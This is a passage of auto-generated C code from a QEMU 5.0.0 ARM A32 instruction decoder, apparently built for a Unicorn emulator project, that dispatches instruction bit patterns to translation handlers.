.0.0.... ....1110 1001.... */ disas_a32_extract_strex(ctx, &u.f_strex, insn); switch (insn & 0x00a00000) { case 0x00800000: /* ....0001 1000.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:383 */ if (trans_STLEX(ctx, &u.f_strex)) return true; return false; case 0x00a00000: /* ....0001 1010.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:384 */ if (trans_STLEXD_a32(ctx, &u.f_strex)) return true; return false; } return false; case 0x00000f00: /* ....0001 .0.0.... ....1111 1001.... */ disas_a32_extract_strex(ctx, &u.f_strex, insn); switch (insn & 0x00a00000) { case 0x00800000: /* ....0001 1000.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:378 */ if (trans_STREX(ctx, &u.f_strex)) return true; return false; case 0x00a00000: /* ....0001 1010.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:379 */ if (trans_STREXD_a32(ctx, &u.f_strex)) return true; return false; } return false; case 0x00100020: /* ....0001 .0.1.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:259 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100040: /* ....0001 .0.1.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:262 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100060: /* ....0001 .0.1.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:265 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100c00: /* ....0001 .0.1.... ....1100 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0000f) { case 0x0080000f: /* ....0001 1001.... ....1100 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:402 */ if (trans_LDA(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00100e00: /* ....0001 .0.1.... ....1110 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0000f) { case 0x0080000f: /* ....0001 1001.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:397 */ if (trans_LDAEX(ctx, &u.f_ldrex)) return true; return false; case 0x00a0000f: /* ....0001 1011.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:398 */ if (trans_LDAEXD_a32(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00100f00: /* ....0001 .0.1.... ....1111 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0000f) { case 0x0080000f: /* ....0001 1001.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:392 */ if (trans_LDREX(ctx, &u.f_ldrex)) return true; return false; case 0x00a0000f: /* ....0001 1011.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:393 */ if (trans_LDREXD_a32(ctx, &u.f_ldrex)) return true; return false; } return false; } return false; case 0x00400000: /* ....0001 .1...... ........ 0..1.... */ switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 010..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0100.... ........ 0..1.... */ switch ((insn >> 5) & 0x3) { case 0x2: /* ....0001 0100.... ........ 0101.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 8) & 0xf) { case 0x0: /* ....0001 0100.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:159 */ if (trans_QDADD(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0100.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:239 */ disas_a32_extract_i16(ctx, &u.f_i, insn); if (trans_HVC(ctx, &u.f_i)) return true; return false; } return false; case 0x1: /* ....0001 0101.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0101.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:102 */ if (trans_CMP_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00200000: /* ....0001 011..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0110.... ........ 0..1.... */ switch (insn & 0x00000f60) { case 0x00000040: /* ....0001 0110.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:160 */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QDSUB(ctx, &u.f_rrr)) return true; return false; case 0x00000060: /* ....0001 0110.... ....0000 0111.... */ disas_a32_extract_disas_a32_Fmt_24(ctx, &u.f_i, insn); switch ((insn >> 12) & 0xff) { case 0x0: /* ....0001 01100000 00000000 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:240 */ if (trans_SMC(ctx, &u.f_i)) return true; return false; } return false; case 0x00000f00: /* ....0001 0110.... ....1111 0001.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch ((insn >> 16) & 0xf) { case 0xf: /* ....0001 01101111 ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:233 */ if (trans_CLZ(ctx, &u.f_rr)) return true; return false; } return false; } return false; case 0x1: /* ....0001 0111.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0111.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:103 */ if (trans_CMN_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00800000: /* ....0001 110..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:106 */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); if (trans_BIC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x00a00000: /* ....0001 111..... ........ 0..1.... */ disas_a32_extract_s_rxr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0001 111.0000 ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:107 */ if (trans_MVN_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00400080: /* ....0001 .1...... ........ 1..1.... */ switch (insn & 0x00100060) { case 0x00000000: /* ....0001 .1.0.... ........ 1001.... */ switch (insn & 0x00a00f00) { case 0x00000000: /* ....0001 0100.... ....0000 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:365 */ disas_a32_extract_swp(ctx, &u.f_disas_a3226, insn); if (trans_SWPB(ctx, &u.f_disas_a3226)) return true; return false; case 0x00800c00: /* ....0001 1100.... ....1100 1001.... */ disas_a32_extract_stl(ctx, &u.f_ldrex, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* ....0001 1100.... 11111100 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:389 */ if (trans_STLB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00800e00: /* ....0001 1100.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:385 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STLEXB(ctx, &u.f_strex)) return true; return false; case 0x00800f00: /* ....0001 1100.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:380 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STREXB(ctx, &u.f_strex)) return true; return false; case 0x00a00c00: /* ....0001 1110.... ....1100 1001.... */ disas_a32_extract_stl(ctx, &u.f_ldrex, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* ....0001 1110.... 11111100 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:390 */ if (trans_STLH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00a00e00: /* ....0001 1110.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:386 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STLEXH(ctx, &u.f_strex)) return true; return false; case 0x00a00f00: /* ....0001 1110.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:381 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STREXH(ctx, &u.f_strex)) return true; return false; } return false; case 0x00000020: /* ....0001 .1.0.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:311 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x00000040: /* ....0001 .1.0.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:314 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x00000060: /* ....0001 .1.0.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:317 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x00100000: /* ....0001 .1.1.... ........ 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a00f0f) { case 0x00800c0f: /* ....0001 1101.... ....1100 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:403 */ if (trans_LDAB(ctx, &u.f_ldrex)) return true; return false; case 0x00800e0f: /* ....0001 1101.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:399 */ if (trans_LDAEXB(ctx, &u.f_ldrex)) return true; return false; case 0x00800f0f: /* ....0001 1101.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:394 */ if (trans_LDREXB(ctx, &u.f_ldrex)) return true; return false; case 0x00a00c0f: /* ....0001 1111.... ....1100 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:404 */ if (trans_LDAH(ctx, &u.f_ldrex)) return true; return false; case 0x00a00e0f: /* ....0001 1111.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:400 */ if (trans_LDAEXH(ctx, &u.f_ldrex)) return true; return false; case 0x00a00f0f: /* ....0001 1111.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:395 */ if (trans_LDREXH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00100020: /* ....0001 .1.1.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:320 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x00100040: /* ....0001 .1.1.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:323 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x00100060: /* ....0001 .1.1.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:326 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; } return false; } return false; case 0x1: /* ....001. ........ ........ ........ */ switch ((insn >> 21) & 0xf) { case 0x0: /* ....0010 000..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:120 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_AND_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* ....0010 001..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:121 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_EOR_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x2: /* ....0010 010..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:122 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x3: /* ....0010 011..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:123 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_RSB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x4: /* ....0010 100..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:124 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x5: /* ....0010 101..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:125 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ADC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x6: /* ....0010 110..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:126 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_SBC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x7: /* ....0010 111..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:127 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_RSC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x8: /* ....0011 000..... ........ ........ */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0011 0000.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:80 */ disas_a32_extract_mov16(ctx, &u.f_ri, insn); if (trans_MOVW(ctx, &u.f_ri)) return true; return false; case 0x1: /* ....0011 0001.... ........ ........ */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0011 0001.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:128 */ if (trans_TST_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0x9: /* ....0011 001..... ........ ........ */ switch (insn & 0x0010f000) { case 0x0000f000: /* ....0011 0010.... 1111.... ........ */ if ((insn & 0x000f0000) == 0x00000000) { /* ....0011 00100000 1111.... ........ */ if ((insn & 0x000000ff) == 0x00000001) { /* ....0011 00100000 1111.... 00000001 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:188 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_YIELD(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000002) { /* ....0011 00100000 1111.... 00000010 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:189 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_WFE(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000003) { /* ....0011 00100000 1111.... 00000011 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:190 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_WFI(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:198 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:201 */ disas_a32_extract_msr_i(ctx, &u.f_msr_i, insn); u.f_msr_i.r = 0; if (trans_MSR_imm(ctx, &u.f_msr_i)) return true; return false; case 0x00100000: /* ....0011 0011.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:129 */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_TEQ_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xa: /* ....0011 010..... ........ ........ */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0011 0100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:81 */ disas_a32_extract_mov16(ctx, &u.f_ri, insn); if (trans_MOVT(ctx, &u.f_ri)) return true; return false; case 0x1: /* ....0011 0101.... ........ ........ */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0011 0101.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:130 */ if (trans_CMP_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0xb: /* ....0011 011..... ........ ........ */ switch (insn & 0x0010f000) { case 0x0000f000: /* ....0011 0110.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:203 */ disas_a32_extract_msr_i(ctx, &u.f_msr_i, insn); u.f_msr_i.r = 1; if (trans_MSR_imm(ctx, &u.f_msr_i)) return true; return false; case 0x00100000: /* ....0011 0111.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:131 */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_CMN_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xc: /* ....0011 100..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:132 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ORR_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0xd: /* ....0011 101..... ........ ........ */ disas_a32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0011 101.0000 ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:133 */ if (trans_MOV_rxi(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xe: /* ....0011 110..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:134 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_BIC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0xf: /* ....0011 111..... ........ ........ */ disas_a32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0011 111.0000 ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:135 */ if (trans_MVN_rxi(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0x2: /* ....010. ........ ........ ........ */ switch (insn & 0x01500000) { case 0x00000000: /* ....0100 .0.0.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .000.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:344 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .010.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:355 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_STRT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00100000: /* ....0100 .0.1.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .001.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:349 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .011.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:357 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_LDRT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00400000: /* ....0100 .1.0.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:346 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .110.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:356 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_STRBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00500000: /* ....0100 .1.1.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .101.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:351 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .111.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:358 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_LDRBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x01000000: /* ....0101 .0.0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:343 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x01100000: /* ....0101 .0.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:348 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x01400000: /* ....0101 .1.0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:345 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x01500000: /* ....0101 .1.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:350 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* ....011. ........ ........ ........ */ switch (insn & 0x01400010) { case 0x00000000: /* ....0110 .0...... ........ ...0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* ....0110 .000.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:284 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0110 .001.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:289 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x2: /* ....0110 .010.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:297 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_STRT_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x3: /* ....0110 .011.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:299 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_LDRT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000010: /* ....0110 .0...... ........ ...1.... */ switch (insn & 0x00a00020) { case 0x00000000: /* ....0110 000..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0001.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:426 */ if (trans_SADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0001.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:428 */ if (trans_SSAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0001.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:430 */ if (trans_SADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00000020: /* ....0110 000..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0001.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:427 */ if (trans_SASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0001.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:429 */ if (trans_SSUB16(ctx, 